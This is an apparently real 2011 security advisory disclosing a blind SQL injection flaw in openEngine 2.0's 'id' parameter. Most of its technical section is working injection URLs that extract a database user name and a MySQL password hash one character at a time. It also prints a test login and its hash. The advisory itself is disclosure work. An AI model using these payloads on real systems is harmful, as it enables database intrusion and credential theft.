Advisory: openEngine 2.0 'id' Blind SQL Injection vulnerability Advisory ID: SSCHADV2011-019 Author: Stefan Schurtz Affected Software: Successfully tested on openEngine 2.0 100226 Vendor URL: Vendor Status: informed CVE-ID: - ========================== Vulnerability Description: ========================== openEngine 2.0 is prone to a Blind SQL Injection ================== Technical Details: ================== Database information User: easy Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0) Blind SQL Injection http:///openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1 AND ('a'='a&key= <- error http:///openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0 AND ('a'='a&key= <- no error User-Guessing http:///openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND ('a'='a <- error (e) http:///openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND ('a'='a <- error (a) http:///openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND ('a'='a <- error (s) http:///openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND ('a'='a <- error (y) Password(Hash)-Guessing http:///openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1)) = 42 AND ('a'='a <- error (*) http:///openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),2,1)) = 69 AND ('a'='a <- error (E) http:///openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),3,1)) = 56 AND ('a'='a <- error (8) .. and so on ========= Solution: ========= - ==================== Disclosure Timeline: ==================== 25-Sep-2011 - informed developers 26-Sep-2011 – release date of this security advisory ======== Credits: ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References: ===========